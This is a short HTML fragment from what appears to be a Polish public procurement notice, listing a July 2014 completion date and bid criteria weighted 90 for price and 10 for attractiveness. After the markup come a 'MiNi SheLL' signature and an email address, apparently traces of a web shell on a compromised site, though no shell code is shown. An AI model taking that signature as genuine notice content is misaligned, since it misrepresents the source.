<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Atrakcyjność - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com